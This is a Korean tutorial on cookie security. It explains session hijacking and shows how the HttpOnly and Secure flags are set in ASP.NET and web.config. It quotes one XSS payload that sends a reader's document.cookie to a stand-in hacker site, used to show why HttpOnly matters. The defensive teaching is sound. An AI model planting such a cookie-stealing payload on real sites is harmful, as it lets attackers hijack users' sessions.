[Web] HTTP Only와 Secure Cookie 이해하기

Cookie에 대한 이해

쿠키는 ASP.NET, PHP와 같은 특정 기술영역에 국한된 것도 아니고, 특정 Client나 Server에만 국한된 기술도 아닙니다. 쿠키는 수십 년 전부터 사용되어 왔으며 최근에는 HTTP에 있어서 없어서는 안될 정도로 광범위하게 이용되고 있습니다. 어떠한 서버도 HTTP통신을 한다면 쿠키를 주고 받을 수 있으며, 클라이언트에서도 쿠키에 접근하고 관리할 수 있습니다. 또한 HTTP와 HTTPS사이에도 쿠키를 교환할 수 있으며, 같은 도메인이라면 서로 다른 Scheme일지라도 쿠키를 공유할 수 있습니다.

쿠키는 서버에서도, 클라이언트에서도 생성할 수 있습니다. 일단 쿠키가 한번 생성되면 브라우저는 해당 쿠키 정보를 기억하게 됩니다. 그리고 이후의 모든 요청(Request)에 쿠키를 포함하여 서버로 전달합니다. 서버는 브라우저의 요청(Request)에 포함된 쿠키를 읽어 들일 수 있습니다.

쿠키를 이해하는데 있어 가장 중요한 부분 중 하나는 쿠키로 인해 야기되는 보안위협에 대해 이해하는 것입니다. 수많은 사이트들에서 민감한 개인정보를 쿠키에 저장하고 있으며, 해커들은 다양한 방법으로 이 쿠키를 탈취하고자 하기 때문입니다. 이러한 쿠키에 대한 보안 공격 중 가장 대중적인 것 중 하나는 바로 세션 하이재킹(Session hijacking) 공격 입니다.

알다시피 HTTP는 Stateless 프로토콜입니다. HTTP는 기본적으로 상태정보를 기억하지 못하기 때문에, 서버는 요청자가 누구인지, 같은 사람인지 다른 사람인지 식별 할 수 없습니다. 이러한 문제를 해결하기 위해, 서버는 사용자 식별정보를 쿠키에 저장하며, 쿠키에 저장된 정보를 통해 각 사용자를 구별합니다. 예를 들면, ASP.NET 서버는 사용자 마다 유일키를 생성하여 .ASPXAUTH라는 이름의 쿠키에 저장하며, 이를 통해 사용자를 식별합니다.

[브라우저의 쿠키에 저장된 사용자 식별정보]

따라서 해커가 다른 사용자의 쿠키를 탈취하게 된다면, 해커는 쿠키에 포함된 사용자 식별정보를 바탕으로 다른 사용자로 위장 할 수 있게 됩니다. 서버는 쿠키를 바탕으로 사용자를 식별하기 때문에, 요청을 보낸 사람이 해커인지 알 수 가 없으며 모든 권한을 내어주게 됩니다.

쿠키를 훔치는 방법은 다양합니다. 예를 들면 공공 Wifi망의 통신패킷을 분석하거나, ISP사업자의 통신케이블을 감청하는 방법도 있습니다. 아니면, 사용자 컴퓨터에 심은 해킹프로그램을 통해 쿠키를 가로채는 방법도 있습니다.

HTTP Only Cookies

쿠키는 클라이언트에서 자바스크립트로 조회할 수 있기 때문에, 해커들은 자바스크립트로 쿠키를 가로채고자 시도를 하게 됩니다. 가장 대표적인 공격 중 하나가 CSS(Cross Site Scripting) 입니다.

location.href = 'http://해커사이트/?cookies=' + document.cookie;

해커가 위와 같은 게시물을 공개게시판에 작성할 경우, 이 게시물을 읽은 다른 사용자는 알아차리기도 전에 자신의 모든 쿠키를 해커에게 전송하게 됩니다.

이러한 CSS 취약점을 해결하는 방법은, 바로 브라우저에서 쿠키에 접근할 수 없도록 제한하는 것입니다. 이러한 역할을 하는 것이 바로 HTTP Only Cookie입니다. 개발자가 다음과 같이 간단한 접미사를 쿠키생성코드에 추가함으로써 활성화 할 수 있습니다.

Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly

가장 마지막에 HttpOnly라는 접미사만 추가함으로써 HTTP Only Cookie가 활성화 되며, 위에서 말한 XSS와 같은 공격이 차단되게 됩니다. HTTP Only Cookie를 설정하면 브라우저에서 해당 쿠키로 접근할 수 없게 되지만, 쿠키에 포함된 정보의 대부분이 브라우저에서 접근할 필요가 없기 때문에 HTTP Only Cookie는 기본적으로 적용하는 것이 좋습니다.

ASP.NET상에서 HTTP Only Cookie를 설정하는 방법은 매우 간단합니다. 쿠키를 추가하실 때 HttpOnly 속성을 true로 설정하시면 됩니다.

Response.Cookies.Add(new HttpCookie("쿠키명")
{
   Value = "쿠키 값",
   HttpOnly = true
});

HttpOnly의 기본값은 false입니다. 만약 기본값을 true로 설정하시려면 web.config에서 다음과 같이 수정하시면 됩니다.

<httpCookies httpOnlyCookies="true" />

Secure Cookies

HTTP Only Cookie를 사용하면 Client에서 Javascript를 통한 쿠키 탈취문제를 예방할 수 있습니다. 하지만, Javascript가 아닌 네트워크를 직접 감청하여 쿠키를 가로챌 수도 있습니다. 미국의 NSA를 포함한 각국의 정보기관들이 Wifi 망 분석, ISP 케이블 감청을 통해 쿠키 등 개인정보를 열람하고 있다는 사실은 더 이상 공공연한 비밀이 아닙니다.

이러한 통신상의 정보유출을 막기 위해, HTTPS 프로토콜을 사용하여 데이터를 암호화하는 방법이 주로 사용되고 있습니다. HTTPS를 사용하면 쿠키 또한 암호화되어 전송되기 때문에, 제3자는 내용을 알 수 없게 됩니다.

문제는 HTTPS로 전송되어야 할 정보가, 개발자의 부주의로 HTTP를 통해 유출되는 경우가 있습니다. 예를 들어 개발자가 다음과 같은 코드를 실수로 작성할 수 있습니다.

<img src="http://www.example.com/images/logo.png" />

브라우저는 http://로 시작되는 위 코드를 만나면 암호화되지 않은 상태로 쿠키를 서버로 전달하게 됩니다. 해커는 이 암호화되지 않은 요청정보를 가로채서 쿠키를 탈취하게 됩니다.

이러한 사고를 방지하는 방법은 쿠키를 생성할 때 secure 접미사를 사용하는 것입니다.

Set-Cookie: 쿠키명=쿠키값; path=/; secure

위와 같이 마지막에 secure라는 접미사를 사용하여 쿠키를 생성하면, 브라우저는 HTTPS가 아닌 통신에서는 쿠키를 전송하지 않습니다.

ASP.NET에서 구현하실 때는 HttpCookie 클래스의 Secure 속성을 true로 설정해 주시면 됩니다.

Response.Cookies.Add(new HttpCookie("쿠키명")
{
    Value = "쿠키 값",
    Secure = true
});

마찬가지로 Secure의 기본값은 false이기 때문에, 기본값을 true로 변경하고자 한다면 web.config에서 requireSSL을 true로 설정하시면 됩니다.

<httpCookies requireSSL="true" />

개발도구

ASafaWeb : URL을 분석하여, 예상 가능한 쿠키 취약점을 정리하여 보고해주는 사이트입니다. HttpOnly가 아닌 Cookie 내역과 HTTPS 요청이 있음에도 Secure를 사용하지 않은 쿠키를 보고서 형태로 정리해 줍니다.